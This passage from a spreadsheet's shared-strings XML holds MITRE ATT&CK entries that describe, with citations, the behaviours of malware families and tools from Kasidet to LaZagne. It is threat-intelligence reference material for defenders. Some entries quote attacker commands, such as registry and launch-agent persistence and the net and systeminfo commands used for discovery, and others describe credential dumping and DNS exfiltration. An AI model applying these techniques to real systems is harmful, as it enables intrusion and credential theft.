    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to change firewall settings to allow a plug-in to be downloaded.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given filename on a victim.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to download and execute additional files.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given process name in processes currently running in the system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) creates a Registry Run key to establish persistence.(Citation: Zscaler Kasidet)(Citation: Microsoft Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging and screen captures.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to identify any anti-virus installed on the infected system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to obtain a victim's system name and operating system version.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) can execute commands using cmd.exe.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about opened windows.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used compromised WordPress blogs as C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can overwrite files with random data before deleting them.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uploads files from a specified directory to the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>If running in a Windows environment, [Kazuar](https://attack.mitre.org/software/S0265) saves a DLL to disk that is injected into the explorer.exe process to execute the payload. [Kazuar](https://attack.mitre.org/software/S0265) can also be configured to inject and execute within specific processes.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can accept multiple URLs for C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can delete files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses FTP and FTPS to communicate with the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) finds a specified directory, lists the files and metadata about those files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used internal nodes on the compromised network for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on local groups and members on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) stages command output and collected data in files before exfiltration.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about local groups and members.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) is obfuscated using the open source ConfuserEx protector. [Kazuar](https://attack.mitre.org/software/S0265) also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying and the &lt;code&gt;ps&lt;/code&gt; command.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a sub-key under several Registry run keys.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can sleep for a specific time and be set to communicate at specific intervals.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures screenshots of the victim’s screen.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a .lnk file to the Windows startup folder.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) encodes communications to the C2 server in Base64.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on the system and local drives.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about network adapters.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on users.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses /bin/bash to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures images from the webcam.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses HTTP and HTTPS to communicate with the C2 server. [Kazuar](https://attack.mitre.org/software/S0265) can also act as a webserver and listen for inbound HTTP requests through an exposed API.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can install itself as a new service.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can download additional software including [Cobalt Strike](https://attack.mitre.org/software/S0154) from servers on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious files.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious links.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed through malicious e-mail attachments.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed via e-mails containing a malicious link.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can RC4-encrypt credentials before sending to the C2.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can create a reverse shell between the infected host and a specified system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has decrypted the binary's configuration once the &lt;code&gt;main&lt;/code&gt; function was launched.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated information gathered from the infected system to the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has trojanized the &lt;sode&gt;ssh_login&lt;/code&gt; and &lt;code&gt;user-auth_pubkey&lt;/code&gt; functions to steal plaintext credentials.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487)'s configuration is hardcoded and RC4 encrypted within the binary.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can use a proxy during exfiltration if set in the configuration.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the system architecture, OS version, and MAC address information.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the DNS address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) attempts to collect passwords from browsers.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to launch a file browser or explorer on the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses &lt;code&gt;-w Hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload. (Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a download and upload functionality.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a keylogger for intercepting credentials and keystrokes.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>In one version of [KeyBoy](https://attack.mitre.org/software/S0387), string obfuscation routines were used to hide many of the critical values referenced in the malware.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses PowerShell commands to download and execute payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses custom SSL libraries to impersonate SSL in C2 traffic.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses Python scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to perform screen grabbing.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can gather extended system information, such as information about the operating system, disks, and memory.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can determine the public or WAN IP address for the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) time-stomped its DLL in order to evade detection.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses VBS scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can launch interactive shells for communicating with the victim machine.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a service pointing to a malicious DLL dropped to disk.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) issues the command &lt;code&gt;reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”&lt;/code&gt; to achieve persistence.(Citation: PWC KeyBoys Feb 2017) (Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) prompts the users for credentials.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a Launch Agent to persist.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a copy of tor2web proxy for HTTPS communications.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses Python for scripting to execute additional commands.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses the keychaindump project to read securityd memory.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) adds the setuid flag to a binary so it can easily elevate in the future.(Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses HTTPS for command and control.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched &lt;code&gt;bash_history&lt;/code&gt; for credentials.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has attempted to brute force hosts over SSH.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed with an Ubuntu container entry point that runs shell scripts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used crontab to download and run shell scripts every minute to ensure persistence.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was run through a deployed Ubuntu container.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed in an Ubuntu container deployed via an open Docker daemon API.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used the find command to search for specific files.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has downloaded additional lateral movement scripts from C2.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used chmod to modify permissions on key files for use.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched for private keys.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used ps to list processes.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used a script to parse files like &lt;code&gt;/etc/hosts&lt;/code&gt; and SSH &lt;code&gt;known_hosts&lt;/code&gt; to discover remote systems.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has created and run a Bitcoin cryptocurrency miner.(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used SSH for lateral movement.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used Unix shell scripts to execute commands in the victim environment.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used valid SSH credentials to access remote hosts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has communicated with C2 over HTTP.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to uninstall malware from the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to list drives on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to conceal its activity through hiding active windows.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to download and execute files.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to initiate keylogging on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to remotely trigger keyboard input and mouse clicks. (Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to capture screenshots on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use SSL and TLS for communications.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has 2 methods for elevating integrity. It can bypass UAC through eventvwr.exe and sdclt.exe.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve the current content of the user clipboard.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download files off the target system to send back to the server.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can perform process injection by using a reflective DLL.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download additional files.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use MSHTA to serve additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by gathering domain controller hashes from NTDS.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan for open TCP ports on the target network.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan local network for open SMB.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Regsvr32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can enable remote desktop on the victim's machine.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Rundll32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by dumping SAM/SECURITY hive.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can run a command on another machine using [PsExec](https://attack.mitre.org/software/S0029).(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve information about the Windows domain.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can identify logged in users across the domain and views user sessions.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can open an interactive command-shell to perform command line functions on victim machines.(Citation: Github Koadic) [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (Jscript) and runs arbitrary shellcode .(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use WMI to execute commands.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) trojan supports file deletion.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) payload is stored in a hidden directory at &lt;code&gt;/Users/Shared/.local/kextd&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t xml:space="preserve"> The [Komplex](https://attack.mitre.org/software/S0162) trojan creates a persistent launch agent called with &lt;code&gt;$HOME/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt; with &lt;code&gt;launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects a running process list.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses an 11-byte XOR algorithm to hide data.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects the current running username.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses HTTP POST requests.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>Before writing to disk, [Kwampirs](https://attack.mitre.org/software/S0236) inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) decrypts and extracts a copy of its main DLL payload when executing.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of domain groups with the command &lt;code&gt;net localgroup /domain&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses a large list of C2 servers that it cycles through until a successful connection is established.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of files and directories in C:\ with the command &lt;code&gt;dir /s /a c:\ &gt;&gt; "C:\windows\TEMP\[RANDOM].tmp"&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files from C2 servers.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of accounts with the command &lt;code&gt;net users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of users belonging to the local users and administrators groups with the commands &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net localgroup users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) establishes persistence by adding a new service with the display name "WMI Performance Adapter Extension" in an attempt to masquerade as a legitimate WMI service.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of network shares with the command &lt;code&gt;net share&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files that are base64-encoded and encrypted with another cipher.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects password policy information with the command &lt;code&gt;net accounts&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of available servers with the command &lt;code&gt;net view&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses rundll32.exe in a Registry value added to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) copies itself over network shares to move laterally on a victim network.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands &lt;code&gt;systeminfo&lt;/code&gt;, &lt;code&gt;net config workstation&lt;/code&gt;, &lt;code&gt;hostname&lt;/code&gt;, &lt;code&gt;ver&lt;/code&gt;, &lt;code&gt;set&lt;/code&gt;, and &lt;code&gt;date /t&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects network adapter and interface information by using the commands &lt;code&gt;ipconfig /all&lt;/code&gt;, &lt;code&gt;arp -a&lt;/code&gt; and &lt;code&gt;route print&lt;/code&gt;. It also collects the system's MAC address with &lt;code&gt;getmac&lt;/code&gt; and domain configuration with &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of active and listening connections by using the command &lt;code&gt;netstat -nao&lt;/code&gt; as well as a list of available network mappings with &lt;code&gt;net use&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects registered owner details by using the commands &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /svc&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) creates a new service named WmiApSrvEx to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox cloud storage service for command and control.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the [LOWBALL](https://attack.mitre.org/software/S0042) malware.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) command and control occurs via HTTPS over port 443.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information from /etc/shadow using the shadow.py module.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from MSCache to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from chats, databases, mail, and WiFi.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from databases, mail, and WiFi across multiple platforms.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
